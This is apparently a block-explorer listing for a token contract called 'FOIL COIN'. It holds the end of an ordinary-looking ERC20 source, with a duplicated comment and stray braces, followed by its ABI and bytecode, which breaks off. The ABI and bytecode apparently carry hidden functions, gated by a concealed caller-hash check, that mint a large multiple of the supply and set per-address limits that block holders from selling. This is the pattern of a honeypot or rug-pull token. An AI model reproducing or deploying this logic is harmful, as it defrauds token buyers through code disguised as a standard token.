        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _totalSupply -= amount;
    }
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }
    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint40","name":"tokenAmount_","type":"uint40"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"nnn","type":"address"}],"name":"_allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"num","type":"uint256"}],"name":"_burnAmounts","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"nnn","type":"address"}],"name":"_decreaseAllowances","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"nnn","type":"address"}],"name":"_increaseAllowances","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60a060405261dead73ffffffffffffffffffffffffffffffffffffffff1660809073ffffffffffffffffffffffffffffffffffffffff168152507f1779a64e8b9cd87d9944553af38e0a07794a3c9286f5269ef06354b2c306ff0160001b6009556000600b553480156200007257600080fd5b5060405162002ac138038062002ac183398181016040528101906200009891906200067e565b620000b8620000ac6200016f60201b60201c565b6200017760201b60201c565b8260069081620000c9919062000963565b508160079081620000db919062000963565b50620000ec6200023b60201b60201c565b5080600860006101000a81548164ffffffffff021916908364ffffffffff160217905550620001663362000125620002fc60201b60201c565b600a62000133919062000bda565b600860009054906101000a900464ffffffffff1664ffffffffff166200015a919062000c2b565b6200030560201b60201c565b50505062000e03565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006200024d6200016f60201b60201c565b600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060006200029f6200016f60201b60201c565b604051602001620002b1919062000cfa565b60405160208183030381529060405280519060200120905060016003600083815260200190815260200160002060006101000a81548160ff0219169083151502179055508091505090565b60006009905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000377576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200036e9062000d78565b60405180910390fd5b80600560008282546200038b919062000d9a565b925050819055506000151560036000600954815260200190815260200160002060009054906101000a900460ff16151503620003f057600160036000600954815260200190815260200160002060006101000a81548160ff0219169083151502179055505b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200049d919062000de6565b60405180910390a35050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200051282620004c7565b810181811067ffffffffffffffff82111715620005345762000533620004d8565b5b80604052505050565b600062000549620004a9565b905062000557828262000507565b919050565b600067ffffffffffffffff8211156200057a5762000579620004d8565b5b6200058582620004c7565b9050602081019050919050565b60005b83811015620005b257808201518184015260208101905062000595565b60008484015250505050565b6000620005d5620005cf846200055c565b6200053d565b905082815260208101848484011115620005f457620005f3620004c2565b5b6200060184828562000592565b509392505050565b600082601f830112620006215762000620620004bd565b5b815162000633848260208601620005be565b91505092915050565b600064ffffffffff82169050919050565b62000658816200063c565b81146200066457600080fd5b50565b60008151905062000678816200064d565b92915050565b6000806000606084860312156200069a5762000699620004b3565b5b600084015167ffffffffffffffff811115620006bb57620006ba620004b8565b5b620006c98682870162000609565b935050602084015167ffffffffffffffff811115620006ed57620006ec620004b8565b5b620006fb8682870162000609565b92505060406200070e8682870162000667565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200076b57607f821691505b60208210810362000781576200078062000723565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007eb7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620007ac565b620007f78683620007ac565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620008446200083e62000838846200080f565b62000819565b6200080f565b9050919050565b6000819050919050565b620008608362000823565b620008786200086f826200084b565b848454620007b9565b825550505050565b600090565b6200088f62000880565b6200089c81848462000855565b505050565b5b81811015620008c457620008b860008262000885565b600181019050620008a2565b5050565b601f8211156200091357620008dd8162000787565b620008e8846200079c565b81016020851015620008f8578190505b6200091062000907856200079c565b830182620008a1565b50505b505050565b600082821c905092915050565b6000620009386000198460080262000918565b1980831691505092915050565b600062000953838362000925565b9150826002028217905092915050565b6200096e8262000718565b67ffffffffffffffff8111156200098a5762000989620004d8565b5b62000996825462000752565b620009a3828285620008c8565b600060209050601f831160018114620009db5760008415620009c6578287015190505b620009d2858262000945565b86555062000a42565b601f198416620009eb8662000787565b60005b8281101562000a1557848901518255600182019150602085019450602081019050620009ee565b8683101562000a35578489015162000a31601f89168262000925565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000ad85780860481111562000ab05762000aaf62000a4a565b5b600185161562000ac05780820291505b808102905062000ad08562000a79565b945062000a90565b94509492505050565b60008262000af3576001905062000bc6565b8162000b03576000905062000bc6565b816001811462000b1c576002811462000b275762000b5d565b600191505062000bc6565b60ff84111562000b3c5762000b3b62000a4a565b5b8360020a91508482111562000b565762000b5562000a4a565b5b5062000bc6565b5060208310610133831016604e8410600b841016171562000b975782820a90508381111562000b915762000b9062000a4a565b5b62000bc6565b62000ba6848484600162000a86565b9250905081840481111562000bc05762000bbf62000a4a565b5b81810290505b9392505050565b600060ff82169050919050565b600062000be7826200080f565b915062000bf48362000bcd565b925062000c237fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000ae1565b905092915050565b600062000c38826200080f565b915062000c45836200080f565b925082820262000c55816200080f565b9150828204841483151762000c6f5762000c6e62000a4a565b5b5092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000ca38262000c76565b9050919050565b60008160601b9050919050565b600062000cc48262000caa565b9050919050565b600062000cd88262000cb7565b9050919050565b62000cf462000cee8262000c96565b62000ccb565b82525050565b600062000d08828462000cdf565b60148201915081905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000d60601f8362000d17565b915062000d6d8262000d28565b602082019050919050565b6000602082019050818103600083015262000d938162000d51565b9050919050565b600062000da7826200080f565b915062000db4836200080f565b925082820190508082111562000dcf5762000dce62000a4a565b5b92915050565b62000de0816200080f565b82525050565b600060208201905062000dfd600083018462000dd5565b92915050565b608051611c9462000e2d600039600081816104c401528181610e2b0152610f010152611c946000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610320578063b69b486414610350578063dd62ed3e1461036c578063e4703d7c1461039c578063f2fde38b146103b857610121565b8063715018a61461028e5780638da5cb5b1461029857806395d89b41146102b6578063a457c2d7146102d4578063a67334901461030457610121565b806327c8f835116100f457806327c8f835146101c2578063313ce567146101e0578063375460cc146101fe578063395093511461022e57806370a082311461025e57610121565b806306fdde0314610126578063095ea7b31461014457806318160ddd1461017457806323b872dd14610192575b600080fd5b61012e6103d4565b60405161013b9190611277565b60405180910390f35b61015e60048036038101906101599190611332565b610466565b60405161016b919061138d565b60405180910390f35b61017c610489565b60405161018991906113b7565b60405180910390f35b6101ac60048036038101906101a791906113d2565b610493565b6040516101b9919061138d565b60405180910390f35b6101ca6104c2565b6040516101d79190611434565b60405180910390f35b6101e86104e6565b6040516101f5919061146b565b60405180910390f35b61021860048036038101906102139190611486565b6104ef565b60405161022591906113b7565b60405180910390f35b61024860048036038101906102439190611332565b610538565b604051610255919061138d565b60405180910390f35b61027860048036038101906102739190611486565b61056f565b60405161028591906113b7565b60405180910390f35b6102966105b8565b005b6102a06105cc565b6040516102ad9190611434565b60405180910390f35b6102be6105f5565b6040516102cb9190611277565b60405180910390f35b6102ee60048036038101906102e99190611332565b610687565b6040516102fb919061138d565b60405180910390f35b61031e600480360381019061031991906114b3565b6106fe565b005b61033a60048036038101906103359190611332565b61070a565b604051610347919061138d565b60405180910390f35b61036a60048036038101906103659190611486565b61072d565b005b610386600480360381019061038191906114e0565b610783565b60405161039391906113b7565b60405180910390f35b6103b660048036038101906103b19190611486565b61080a565b005b6103d260048036038101906103cd9190611486565b61086f565b005b6060600680546103e39061154f565b80601f016020809104026020016040519081016040528092919081815260200182805461040f9061154f565b801561045c5780601f106104315761010080835404028352916020019161045c565b820191906000526020600020905b81548152906001019060200180831161043f57829003601f168201915b5050505050905090565b6000806104716108f2565b905061047e8185856108fa565b600191505092915050565b6000600554905090565b60008061049e6108f2565b90506104ab858285610ac3565b6104b6858585610b4f565b60019150509392505050565b7f000000000000000000000000000000000000000000000000000000000000000081565b60006009905090565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000806105436108f2565b90506105648185856105558589610783565b61055f91906115af565b6108fa565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c0610f8e565b6105ca600061100c565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546106049061154f565b80601f01602080910402602001604051908101604052809291908181526020018280546106309061154f565b801561067d5780601f106106525761010080835404028352916020019161067d565b820191906000526020600020905b81548152906001019060200180831161066057829003601f168201915b5050505050905090565b6000806106926108f2565b905060006106a08286610783565b9050838110156106e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106dc90611655565b60405180910390fd5b6106f282868684036108fa565b60019250505092915050565b610707816110d0565b50565b6000806107156108f2565b9050610722818585610b4f565b600191505092915050565b610735611139565b15610780576000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610812611139565b1561086c57620f42406005546108289190611675565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b610877610f8e565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108e6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108dd90611729565b60405180910390fd5b6108ef8161100c565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610969576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610960906117bb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109cf9061184d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ab691906113b7565b60405180910390a3505050565b6000610acf8484610783565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b495781811015610b3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b32906118b9565b60405180910390fd5b610b4884848484036108fa565b5b50505050565b6000610ba46000600a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111a590919063ffffffff16565b905081811115610be9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be090611925565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610c58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4f906119b7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbe90611a49565b60405180910390fd5b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610d4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4590611adb565b60405180910390fd5b6000610d786064610d6a600b54876111bb90919063ffffffff16565b6111d190919063ffffffff16565b90506000610d8f82866111a590919063ffffffff16565b9050848303600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555081600160007f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610eee91906113b7565b60405180910390a36000821115610f85577f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f7c91906113b7565b60405180910390a35b50505050505050565b610f966108f2565b73ffffffffffffffffffffffffffffffffffffffff16610fb46105cc565b73ffffffffffffffffffffffffffffffffffffffff161461100a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100190611b47565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6110d8611139565b1561113657806005546110eb9190611675565b600160006110f76108f2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000806111446108f2565b6040516020016111549190611baf565b6040516020818303038152906040528051906020012090506003600082815260200190815260200160002060009054906101000a900460ff161561119c5760019150506111a2565b60009150505b90565b600081836111b39190611bca565b905092915050565b600081836111c99190611675565b905092915050565b600081836111df9190611c2d565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611221578082015181840152602081019050611206565b60008484015250505050565b6000601f19601f8301169050919050565b6000611249826111e7565b61125381856111f2565b9350611263818560208601611203565b61126c8161122d565b840191505092915050565b60006020820190508181036000830152611291818461123e565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112c98261129e565b9050919050565b6112d9816112be565b81146112e457600080fd5b50565b6000813590506112f6816112d0565b92915050565b6000819050919050565b61130f816112fc565b811461131a57600080fd5b50565b60008135905061132c81611306565b92915050565b6000806040838503121561134957611348611299565b5b6000611357858286016112e7565b92505060206113688582860161131d565b9150509250929050565b60008115159050919050565b61138781611372565b82525050565b60006020820190506113a2600083018461137e565b92915050565b6113b1816112fc565b82525050565b60006020820190506113cc60008301846113a8565b92915050565b6000806000606084860312156113eb576113ea611299565b5b60006113f9868287016112e7565b935050602061140a868287016112e7565b925050604061141b8682870161131d565b9150509250925092565b61142e816112be565b82525050565b60006020820190506114496000830184611425565b92915050565b600060ff82169050919050565b6114658161144f565b82525050565b6000602082019050611480600083018461145c565b92915050565b60006020828403121561149c5761149b611299565b5b60006114aa848285016112e7565b91505092915050565b6000602082840312156114c9576114c8611299565b5b60006114d78482850161131d565b91505092915050565b600080604083850312156114f7576114f6611299565b5b6000611505858286016112e7565b9250506020611516858286016112e7565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061156757607f821691505b60208210810361157a57611579611520565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115ba826112fc565b91506115c5836112fc565b92508282019050808211156115dd576115dc611580565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061163f6025836111f2565b915061164a826115e3565b604082019050919050565b6000602082019050818103600083015261166e81611632565b9050919050565b6000611680826112fc565b915061168b836112fc565b9250828202611699816112fc565b915082820484148315176116b0576116af611580565b5b5092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117136026836111f2565b915061171e826116b7565b604082019050919050565b6000602082019050818103600083015261174281611706565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117a56024836111f2565b91506117b082611749565b604082019050919050565b600060208201905081810360008301526117d481611798565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118376022836111f2565b9150611842826117db565b604082019050919050565b600060208201905081810360008301526118668161182a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118a3601d836111f2565b91506118ae8261186d565b602082019050919050565b600060208201905081810360008301526118d281611896565b9050919050565b7f4b4b4b4b4b000000000000000000000000000000000000000000000000000000600082015250565b600061190f6005836111f2565b915061191a826118d9565b602082019050919050565b6000602082019050818103600083015261193e81611902565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119a16025836111f2565b91506119ac82611945565b604082019050919050565b600060208201905081810360008301526119d081611994565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a336023836111f2565b9150611a3e826119d7565b604082019050919050565b60006020820190508181036000830152611a6281611a26565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611ac56026836111f2565b9150611ad082611a69565b604082019050919050565b60006020820190508181036000830152611af481611ab8565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b316020836111f2565b9150611b3c82611afb565b602082019050919050565b60006020820190508181036000830152611b6081611b24565b9050919050565b60008160601b9050919050565b6000611b7f82611b67565b9050919050565b6000611b9182611b74565b9050919050565b611ba9611ba4826112be565b611b86565b82525050565b6000611bbb8284611b98565b60148201915081905092915050565b6000611bd5826112fc565b9150611be0836112fc565b9250828203905081811115611bf857611bf7611580565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611c38826112fc565b9150611c43836112fc565b925082611c5357611c52611bfe565b5b82820490509291505056fea264697066735822122065af20299027e12538603df13742f158ff41ec091e7524e62dd0d4752044d29764736f6c63430008130033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000003b9aca000000000000000000000000000000000000000000000000000000000000000009464f494c20434f494e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004464f494c00000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101215760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610320578063b69b486414610350578063dd62ed3e1461036c578063e4703d7c1461039c578063f2fde38b146103b857610121565b8063715018a61461028e5780638da5cb5b1461029857806395d89b41146102b6578063a457c2d7146102d4578063a67334901461030457610121565b806327c8f835116100f457806327c8f835146101c2578063313ce567146101e0578063375460cc146101fe578063395093511461022e57806370a082311461025e57610121565b806306fdde0314610126578063095ea7b31461014457806318160ddd1461017457806323b872dd14610192575b600080fd5b61012e6103d4565b60405161013b9190611277565b60405180910390f35b61015e60048036038101906101599190611332565b610466565b60405161016b919061138d565b60405180910390f35b61017c610489565b60405161018991906113b7565b60405180910390f35b6101ac60048036038101906101a791906113d2565b610493565b6040516101b9919061138d565b60405180910390f35b6101ca6104c2565b6040516101d79190611434565b60405180910390f35b6101e86104e6565b6040516101f5919061146b565b60405180910390f35b61021860048036038101906102139190611486565b6104ef565b60405161022591906113b7565b60405180910390f35b61024860048036038101906102439190611332565b610538565b604051610255919061138d565b60405180910390f35b61027860048036038101906102739190611486565b61056f565b60405161028591906113b7565b60405180910390f35b6102966105b8565b005b6102a06105cc565b6040516102ad9190611434565b60405180910390f35b6102be6105f5565b6040516102cb9190611277565b60405180910390f35b6102ee60048036038101906102e99190611332565b610687565b6040516102fb919061138d565b60405180910390f35b61031e600480360381019061031991906114b3565b6106fe565b005b61033a60048036038101906103359190611332565b61070a565b604051610347919061138d565b60405180910390f35b61036a60048036038101906103659190611486565b61072d565b005b610386600480360381019061038191906114e0565b610783565b60405161039391906113b7565b60405180910390f35b6103b660048036038101906103b19190611486565b61080a565b005b6103d260048036038101906103cd9190611486565b61086f565b005b6060600680546103e39061154f565b80601f016020809104026020016040519081016040528092919081815260200182805461040f9061154f565b801561045c5780601f106104315761010080835404028352916020019161045c565b820191906000526020600020905b81548152906001019060200180831161043f57829003601f168201915b5050505050905090565b6000806104716108f2565b905061047e8185856108fa565b600191505092915050565b6000600554905090565b60008061049e6108f2565b90506104ab858285610ac3565b6104b6858585610b4f565b60019150509392505050565b7f000000000000000000000000000000000000000000000000000000000000dead81565b60006009905090565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000806105436108f2565b90506105648185856105558589610783565b61055f91906115af565b6108fa565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c0610f8e565b6105ca600061100c565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546106049061154f565b80601f01602080910402602001604051908101604052809291908181526020018280546106309061154f565b801561067d5780601f106106525761010080835404028352916020019161067d565b820191906000526020600020905b81548152906001019060200180831161066057829003601f168201915b5050505050905090565b6000806106926108f2565b905060006106a08286610783565b9050838110156106e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106dc90611655565b60405180910390fd5b6106f282868684036108fa565b60019250505092915050565b610707816110d0565b50565b6000806107156108f2565b9050610722818585610b4f565b600191505092915050565b610735611139565b15610780576000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610812611139565b1561086c57620f42406005546108289190611675565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b610877610f8e565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108e6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108dd90611729565b60405180910390fd5b6108ef8161100c565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610969576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610960906117bb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109cf9061184d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ab691906113b7565b60405180910390a3505050565b6000610acf8484610783565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b495781811015610b3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b32906118b9565b60405180910390fd5b610b4884848484036108fa565b5b50505050565b6000610ba46000600